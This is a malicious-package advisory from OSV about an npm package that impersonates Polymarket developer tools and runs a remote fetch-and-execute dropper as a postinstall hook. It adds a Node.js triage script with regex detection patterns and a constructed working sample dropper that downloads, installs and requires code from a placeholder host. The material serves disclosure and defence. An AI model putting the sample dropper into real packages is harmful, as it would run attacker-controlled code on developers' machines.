polymarket-trading-developer-tools@0.1.1

Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC

Malicious

OSV ID

MAL-2026-6692

Ecosystem

npm

Summary

On npm install, scripts/install-check.cjs runs as a postinstall hook and performs a fetch-and-execute chain controlled by a remote server. It requests a JSON config from pm-trading-dev-tools-be.vercel.app, reads a bundle URL from the response, downloads a .tgz into .peer/, extracts it, runs npm install --omit=dev inside the extracted directory (which executes the arbitrary lifecycle scripts of whatever dependencies the fetched bundle declares), then require()s the extracted peer-math.js and invokes syncSession(). The bundle URL is chosen by the server per request, unpinned, and unverified by hash or signature, and the publisher does not match Polymarket.

The package name (polymarket-trading-developer-tools@0.1.0) impersonates the Polymarket developer ecosystem, while the README self-identifies as polymarket-stake-math with a fabricated 3.x changelog. The dropper is framed as a routine peer dependency check (env vars PSM_PEER_URL / PSM_SYNC_CONFIG / KELLY_PEER_CONFIG, log tag "[polymarket-stake-math] install check skipped") even though the package ships only a ~40-line self-contained math helper with no real peer concept.

Result: any developer running npm install on this package executes attacker-controlled code under their user account.
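The chain above (install-time hook, remote config, server-chosen archive, nested npm install, dynamic require) is the pattern a pre-install triage should catch. The following is an added example, not code from the package, from OSV or from Amazon Inspector: a small Node.js check that lists the lifecycle hooks a package.json declares and scans the hook's source for the indicators of a fetch-and-execute dropper. The manifests, the hook sources, the package names and the example.invalid URL are all constructed for the example and deliberately do not reproduce the real package's contents.

```javascript
// Added example: pre-install triage of an npm package manifest and the
// source of its lifecycle hook. Not code from the package or from OSV;
// the sample inputs are constructed to mirror the chain the advisory describes.

// Lifecycle scripts npm can run during `npm install`
// (prepare only for git/local installs, the others for registry tarballs too).
const INSTALL_TIME_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators of a fetch-and-execute dropper. Each alone is common in
// legitimate code; several together inside an install-time hook is the signal.
const INDICATORS = {
  remoteFetch: /\b(fetch|https?\.(get|request))\s*\(/,
  envControlledUrl: /process\.env\.[A-Z0-9_]*(URL|CONFIG)\b/,
  archiveHandling: /\.tgz\b|\btar\b/,
  nestedInstall: /\bnpm\s+(i|install|ci)\b/,
  shellExec: /\b(execSync|spawnSync|exec|spawn)\s*\(/,
  dynamicRequire: /require\s*\(\s*[^'"`)\s]/, // require() of a non-literal path
};

// Install-time hooks declared in package.json, in the order npm runs them.
function installTimeHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_TIME_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Names of the indicators whose pattern appears in the hook's source text.
function matchedIndicators(source) {
  return Object.entries(INDICATORS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name);
}

// Block when an install-time hook both reaches out over the network and
// unpacks, installs or dynamically loads what it fetched.
function triage(manifest, hookSource) {
  const hooks = installTimeHooks(manifest);
  const indicators = hooks.length ? matchedIndicators(hookSource) : [];
  const fetches = indicators.includes('remoteFetch');
  const runsFetched = ['archiveHandling', 'nestedInstall', 'shellExec', 'dynamicRequire']
    .some((name) => indicators.includes(name));
  return {
    hooks: hooks.map((h) => h.hook),
    indicators,
    verdict: fetches && runsFetched ? 'BLOCK: install-time fetch-and-execute' : 'PASS',
  };
}

// Constructed inputs (not the real package). The hook mirrors the advisory:
// remote config -> server-chosen bundle URL -> .tgz -> nested npm install -> require().
const SUSPECT_MANIFEST = {
  name: 'example-trading-tools',
  version: '0.0.0',
  scripts: { postinstall: 'node scripts/install-check.cjs' },
};
const SUSPECT_HOOK = `
const { execSync } = require('child_process');
const fs = require('fs');
const path = require('path');
async function main() {
  const cfgUrl = process.env.PSM_PEER_URL || 'https://example.invalid/config.json';
  const cfg = await (await fetch(cfgUrl)).json();
  const tgz = Buffer.from(await (await fetch(cfg.bundleUrl)).arrayBuffer());
  fs.mkdirSync('.peer', { recursive: true });
  fs.writeFileSync('.peer/bundle.tgz', tgz);
  execSync('tar -xzf .peer/bundle.tgz -C .peer');
  execSync('npm install --omit=dev', { cwd: '.peer/package' });
  require(path.join(process.cwd(), '.peer/package/peer-math.js')).syncSession();
}
main().catch(() => console.log('[example] install check skipped'));
`;

// Constructed benign comparison: a postinstall that only writes a local file.
const BENIGN_MANIFEST = {
  name: 'example-local-build',
  version: '1.0.0',
  scripts: { postinstall: 'node scripts/build.js' },
};
const BENIGN_HOOK = `
const fs = require('fs');
fs.mkdirSync('build', { recursive: true });
fs.writeFileSync('build/index.js', 'module.exports = {};');
`;

console.log(JSON.stringify(triage(SUSPECT_MANIFEST, SUSPECT_HOOK), null, 2));
console.log(JSON.stringify(triage(BENIGN_MANIFEST, BENIGN_HOOK), null, 2));
```

Indicator matching like this is a triage aid, not a control: a dropper that builds its strings at runtime or hides behind a dependency will evade the regexes. The durable mitigation for the class of attack described here is to stop lifecycle scripts from running at all during installs (ignore-scripts=true in .npmrc, or npm install --ignore-scripts) and to re-enable them only for an explicit allow-list of packages that genuinely need a native build step.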

Source: amazon-inspector (b81db3cfbdf6d7b0879b6aaf3ad13a458141edfafa53074658911c9203e55dca)